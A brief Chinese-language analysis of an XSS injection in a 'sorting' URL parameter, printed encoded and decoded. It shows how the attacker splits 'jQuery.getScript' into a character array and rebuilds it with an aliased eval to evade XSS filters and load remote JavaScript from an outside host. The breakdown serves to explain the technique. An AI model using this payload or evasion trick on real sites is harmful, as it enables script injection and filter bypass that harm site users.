/ Code

XSS: 伪装script调用的函数,绕过xss校验

  • 注入XSS原文
...
&sorting=%27;var%20a=[%27j%27,%27Q%27,%27u%27,%27e%27,%27r%27,%27y%27,%27.%27,%27g%27,%27e%27,%27t%27,%27S%27,%27c%27,%27r%27,%27i%27,%27p%27,%27t%27],b=eval,c=b(a.join(%27%27));c(%27http://aws.35xf.cn/bridge/b.js%27);;%27
...
  • 注入XSS解码
...
&sorting=';var a=['j','Q','u','e','r','y','.','g','e','t','S','c','r','i','p','t'],b=eval,c=b(a.join(''));c('http://aws.35xf.cn/bridge/b.js');;'
...
  • 注入XSS分析
    1. 把script命令拆成字母数组 -- a
      var a=['j','Q','u','e','r','y','.','g','e','t','S','c','r','i','p','t']
    2. 建立转换命令 -- b
      b=eval
    3. 建立伪装script调用命令 -- c
      c=b(a.join(''))
    4. 执行c命令,调用远程js -- c(js)
      c('http://aws.35xf.cn/bridge/b.js')